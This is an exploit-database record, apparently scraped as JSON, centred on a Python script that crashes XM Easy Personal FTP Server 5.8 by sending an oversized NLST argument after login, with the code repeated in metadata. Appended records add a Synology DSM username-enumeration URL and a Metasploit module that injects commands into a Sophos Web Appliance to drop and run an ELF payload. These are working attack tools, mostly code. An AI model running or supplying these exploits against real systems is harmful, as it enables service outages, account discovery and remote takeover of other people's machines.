ID 1337DAY-ID-9554
Type zdt
Reporter Platen
Modified 2009-10-02T00:00:00
Description
Exploit for unknown platform in category remote exploits
============================
XM Easy Personal FTP 5.8 DoS
============================
# Title: XM Easy Personal FTP 5.8 DoS
# CVE-ID: ()
# OSVDB-ID: ()
# Author: PLATEN
# Published: 2009-10-02
# Verified: yes
view source
print?
#!/usr/bin/python
print "\n###############################################################"
print "## Iranian Pentesters Home ##"
print "## XM Easy Personal FTP Server 5.8 Remote Denial Of Service ##"
print "## http://www.dxm2008.com/data/ftpserversetup.exe ##"
print "## author: PLATEN ##"
print "############################################################### \n"
import socket
import sys
def Usage():
print ("Usage: ./expl.py <host> <Username> <password>\n")
buffer= "./A" * 6300
subme()
def start(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] Send evil string"
sock.send("nlst %s\r\n" %buffer)
sock.close()
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
start(hostname,username,passwd)
sys.exit(0)
# 0day.today [2018-03-02] #
{"published": "2009-10-02T00:00:00", "id": "1337DAY-ID-9554", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:06:11", "bulletin": {"published": "2009-10-02T00:00:00", "id": "1337DAY-ID-9554", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 2.6, "modified": "2016-04-20T00:06:11"}}, "hash": "f9ea1cd46a89f98b832485b5bbb0db63940fef56911c45652194f25570a5696d", "description": "Exploit for unknown platform in category remote exploits", "type": "zdt", "lastseen": "2016-04-20T00:06:11", "edition": 1, "title": "XM Easy Personal FTP 5.8 DoS", "href": "http://0day.today/exploit/description/9554", "modified": "2009-10-02T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/9554", "references": [], "reporter": "Platen", "sourceData": "============================\r\nXM Easy Personal FTP 5.8 DoS\r\n============================\r\n\r\n\r\n# Title: XM Easy Personal FTP 5.8 DoS\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: PLATEN\r\n# Published: 2009-10-02\r\n# Verified: yes\r\n\r\n\r\nview source\r\nprint?\r\n#!/usr/bin/python\r\nprint \"\\n###############################################################\"\r\nprint \"## Iranian Pentesters Home ##\"\r\nprint \"## XM Easy Personal FTP Server 5.8 Remote Denial Of Service ##\"\r\nprint \"## http://www.dxm2008.com/data/ftpserversetup.exe ##\"\r\nprint \"## author: PLATEN ##\"\r\nprint \"############################################################### \\n\"\r\nimport socket\r\nimport sys\r\n \r\ndef Usage():\r\n print (\"Usage: ./expl.py <host> <Username> <password>\\n\")\r\nbuffer= \"./A\" * 6300\r\nsubme()\r\ndef start(hostname, username, passwd):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect((hostname, 21))\r\n except:\r\n print (\"[-] Connection error!\")\r\n sys.exit(1)\r\n r=sock.recv(1024)\r\n print \"[+] \" + r\r\n sock.send(\"user %s\\r\\n\" %username)\r\n r=sock.recv(1024)\r\n sock.send(\"pass %s\\r\\n\" %passwd)\r\n r=sock.recv(1024)\r\n print \"[+] Send evil string\"\r\n sock.send(\"nlst %s\\r\\n\" %buffer)\r\n sock.close()\r\n \r\nif len(sys.argv) <> 4:\r\n Usage()\r\n sys.exit(1)\r\nelse:\r\n hostname=sys.argv[1]\r\n username=sys.argv[2]\r\n passwd=sys.argv[3]\r\n start(hostname,username,passwd)\r\n sys.exit(0)\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "9c43fe7e404e153a99c4a774949b98fe", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "4910e266220b9c53d4183fecefeddd83", "key": "sourceHref"}, {"hash": "71c033ff276823a24d3e8a9f8f387544", "key": "published"}, {"hash": "71c033ff276823a24d3e8a9f8f387544", "key": "modified"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "b5cec9052c36a635e8bb256813c6f242", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "fe75cb25418553594146a97b2c65ad09", "key": "sourceData"}, {"hash": "a67b79ede455dff9b512ca8761c393d2", "key": "reporter"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category remote exploits", "hash": "a4f20e9215f0cf5096fad04d8e9ff2bf7b1a52de05484a393f6e4065f9f85d7c", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-03-02T23:33:35", "edition": 2, "title": "XM Easy Personal FTP 5.8 DoS", "href": "https://0day.today/exploit/description/9554", "modified": "2009-10-02T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "https://0day.today/exploit/9554", "references": [], "reporter": "Platen", "sourceData": "============================\r\nXM Easy Personal FTP 5.8 DoS\r\n============================\r\n\r\n\r\n# Title: XM Easy Personal FTP 5.8 DoS\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: PLATEN\r\n# Published: 2009-10-02\r\n# Verified: yes\r\n\r\n\r\nview source\r\nprint?\r\n#!/usr/bin/python\r\nprint \"\\n###############################################################\"\r\nprint \"## Iranian Pentesters Home ##\"\r\nprint \"## XM Easy Personal FTP Server 5.8 Remote Denial Of Service ##\"\r\nprint \"## http://www.dxm2008.com/data/ftpserversetup.exe ##\"\r\nprint \"## author: PLATEN ##\"\r\nprint \"############################################################### \\n\"\r\nimport socket\r\nimport sys\r\n \r\ndef Usage():\r\n print (\"Usage: ./expl.py <host> <Username> <password>\\n\")\r\nbuffer= \"./A\" * 6300\r\nsubme()\r\ndef start(hostname, username, passwd):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect((hostname, 21))\r\n except:\r\n print (\"[-] Connection error!\")\r\n sys.exit(1)\r\n r=sock.recv(1024)\r\n print \"[+] \" + r\r\n sock.send(\"user %s\\r\\n\" %username)\r\n r=sock.recv(1024)\r\n sock.send(\"pass %s\\r\\n\" %passwd)\r\n r=sock.recv(1024)\r\n print \"[+] Send evil string\"\r\n sock.send(\"nlst %s\\r\\n\" %buffer)\r\n sock.close()\r\n \r\nif len(sys.argv) <> 4:\r\n Usage()\r\n sys.exit(1)\r\nelse:\r\n hostname=sys.argv[1]\r\n username=sys.argv[2]\r\n passwd=sys.argv[3]\r\n start(hostname,username,passwd)\r\n sys.exit(0)\r\n\r\n\r\n\n# 0day.today [2018-03-02] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "0afaddcfe9ac2a9ae9dd24c4ebc8fa64", "key": "href"}, {"hash": "71c033ff276823a24d3e8a9f8f387544", "key": "modified"}, {"hash": "71c033ff276823a24d3e8a9f8f387544", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a67b79ede455dff9b512ca8761c393d2", "key": "reporter"}, {"hash": "1fa211674bc1c3111ae5ebe03eb73798", "key": "sourceData"}, {"hash": "8a00d3cb45acb9cd7cc9b4153a9cd09c", "key": "sourceHref"}, {"hash": "b5cec9052c36a635e8bb256813c6f242", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"result": {"zdt": [{"lastseen": "2018-04-01T19:39:42", "references": [], "description": "Exploit for cgi platform in category web applications", "edition": 1, "reporter": "Steve Kaun", "published": "2018-01-08T00:00:00", "title": "Synology DiskStation Manager (DSM) < 6.1.3-15152 - forget_passwd.cgi User Enumeration", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9554"], "modified": "2018-01-08T00:00:00", "href": "https://0day.today/exploit/description/29398", "id": "1337DAY-ID-29398", "sourceData": "# Exploit Title: Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration \r\n# Date: 01/05/2018\r\n# Exploit Author: Steve Kaun\r\n# Vendor Homepage: https://www.synology.com\r\n# Version: Before 6.1.3-15152\r\n# CVE : CVE-2017-9554\r\n \r\nPreviously this was identified by the developer and the disclosure states \"via unspecified vectors\" it is possible to enumerate usernames via forget_passwd.cgi\r\n \r\nHaven't identified any other disclosures that actually identified the attack vector, figure it would be helpful to another.\r\n \r\n \r\n\"An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors.\"\r\n \r\nWell then... Here you go, cracked the code and figured it out.\r\n \r\nhttps://IP_Address:5001/webman/forget_passwd.cgi?user=XXX\r\n \r\nWhere XXX should be your injection point for username lists.\r\n \r\nSeveral usernames I've found are admin, administrator, root, nobody, ftp, and more. I'm unsure of whether Synology is pulling these entries from it's passwd file or not, but there you go.\n\n# 0day.today [2018-04-01] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/29398"}, {"lastseen": "2018-03-06T03:36:30", "references": [], "description": "Exploit for linux platform in category remote exploits", "edition": 1, "reporter": "xort", "published": "2017-02-25T00:00:00", "title": "Sophos Web Appliance 4.2.1.3 Remote Command Execution Exploit", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9554"], "modified": "2017-02-25T00:00:00", "href": "https://0day.today/exploit/description/27124", "id": "1337DAY-ID-27124", "sourceData": "# Exploit Title: Sophos Web Appliance diagnostic_tools wget Remote Command Injection Vulnerablity\r\n# Date: 12/12/2016\r\n# Exploit Author: xort @ Critical Start\r\n# Vendor Homepage: www.sophos.com\r\n# Software Link: sophos.com/en-us/products/secure-web-gateway.aspx\r\n# Version: 4.2.1.3\r\n# Tested on: 4.2.1.3\r\n#\r\n# CVE : CVE-2016-9554\r\n\r\n# vuln: diagnostic_tools command / host parameter / MgrReport.php exploit\r\n\r\n# Description PostAuth Sophos Web App FW <= v4.2.1.3 for capablities. This exploit leverages a command injection bug.\r\n#\r\n# xort @ Critical Start\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\nRank = ExcellentRanking\r\ninclude Exploit::Remote::Tcp\r\ninclude Msf::Exploit::Remote::HttpClient\r\n\r\ndef initialize(info = {})\r\nsuper(update_info(info,\r\n'Name' => 'Sophos Web Appliace <= v4.2.1.3 remote exploit',\r\n'Description' => %q{\r\nThis module exploits a remote command execution vulnerability in\r\nthe Sophos Web Appliace Version <= v4.2.1.3. The vulnerability exist in\r\na section of the machine's adminstrative infertface for performing diagnostic\r\nnetwork test with wget and unsanitized unser supplied information.\r\n},\r\n'Author' =>\r\n[\r\n'[email\u00a0protected] Start', # vuln + metasploit module\r\n],\r\n'Version' => '$Revision: 1 $',\r\n'References' =>\r\n[\r\n[ 'none', 'none'],\r\n],\r\n'Platform' => [ 'linux'],\r\n'Privileged' => true,\r\n'Arch' => [ ARCH_X86 ],\r\n'SessionTypes' => [ 'shell' ],\r\n'Privileged' => false,\r\n\r\n'Payload' =>\r\n{\r\n'Compat' =>\r\n{\r\n'ConnectionType' => 'find',\r\n}\r\n},\r\n\r\n'Targets' =>\r\n[\r\n['Linux Universal',\r\n{\r\n'Arch' => ARCH_X86,\r\n'Platform' => 'linux'\r\n}\r\n],\r\n],\r\n'DefaultTarget' => 0))\r\n\r\nregister_options(\r\n[\r\nOptString.new('PASSWORD', [ false, 'Device password', \"\" ]),\r\nOptString.new('USERNAME', [ true, 'Device password', \"admin\" ]),\r\nOptString.new('CMD', [ false, 'Command to execute', \"\" ]),\r\nOpt::RPORT(443),\r\n], self.class)\r\nend\r\n\r\ndef do_login(username, password_clear)\r\nvprint_status( \"Logging into machine with credentials...\\n\" )\r\n\r\n# vars\r\ntimeout = 1550;\r\nstyle_key = Rex::Text.rand_text_hex(32)\r\n\r\n# send request\r\nres = send_request_cgi(\r\n{\r\n'method' => 'POST',\r\n'uri' => \"/index.php\",\r\n'vars_get' => {\r\n'c' => 'login',\r\n},\r\n'vars_post' =>\r\n{\r\n\r\n'STYLE' => style_key,\r\n'destination' => '',\r\n'section' => '',\r\n'username' => username,\r\n'password' => password_clear,\r\n}\r\n}, timeout)\r\n\r\nreturn style_key\r\nend\r\n\r\ndef run_command(username, style_password, cmd)\r\n\r\nvprint_status( \"Running Command...\\n\" )\r\n\r\n# send request with payload\r\nres = send_request_cgi({\r\n'method' => 'POST',\r\n'vars_post' => {\r\n'action' => 'wget',\r\n'section' => 'configuration',\r\n'STYLE' => style_password ,\r\n'url' => 'htt%3a%2f%2fwww.google.com%2f`'+cmd+'`',\r\n},\r\n'vars_get' => {\r\n'c' => 'diagnostic_tools',\r\n},\r\n})\r\n\r\nend\r\n\r\n\r\ndef exploit\r\n# timeout\r\ntimeout = 1550;\r\n\r\n# params\r\npassword_clear = datastore['PASSWORD']\r\nuser = datastore['USERNAME']\r\n\r\n# do authentication\r\nstyle_hash = do_login(user, password_clear)\r\n\r\nvprint_status(\"STATUS hash authenticated: #{style_hash}\\n\")\r\n\r\n# pause to let things run smoothly\r\nsleep(5)\r\n\r\n#if no 'CMD' string - add code for root shell\r\nif not datastore['CMD'].nil? and not datastore['CMD'].empty?\r\n\r\ncmd = datastore['CMD']\r\n\r\n# Encode cmd payload\r\nencoded_cmd = cmd.unpack(\"H*\").join().gsub(/(w)(w)/,'\\x12')\r\n\r\n# kill stale calls to bdump from previous exploit calls for re-use\r\nrun_command(user, style_hash, (\"sudo%20/bin/rm%20-f%20/tmp/n%20;printf%20\"#{encoded_cmd}\"%20>%20/tmp/n;%20chmod%20+rx%20/tmp/n;/tmp/n\" ))\r\nelse\r\n# Encode payload to ELF file for deployment\r\nelf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)\r\nencoded_elf = elf.unpack(\"H*\").join().gsub(/(w)(w)/,'\\\\x12')\r\n\r\n# upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)\r\nrun_command(user, style_hash, (\"echo%20-e%20#{encoded_elf}>%20/tmp/m;chmod%20%2brx%20/tmp/m;/tmp/m\"))\r\n\r\n# wait for magic\r\nhandler\r\n\r\nend\r\n\r\n\r\nend\r\n# sophox-release\r\nend\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/27124"}]}}
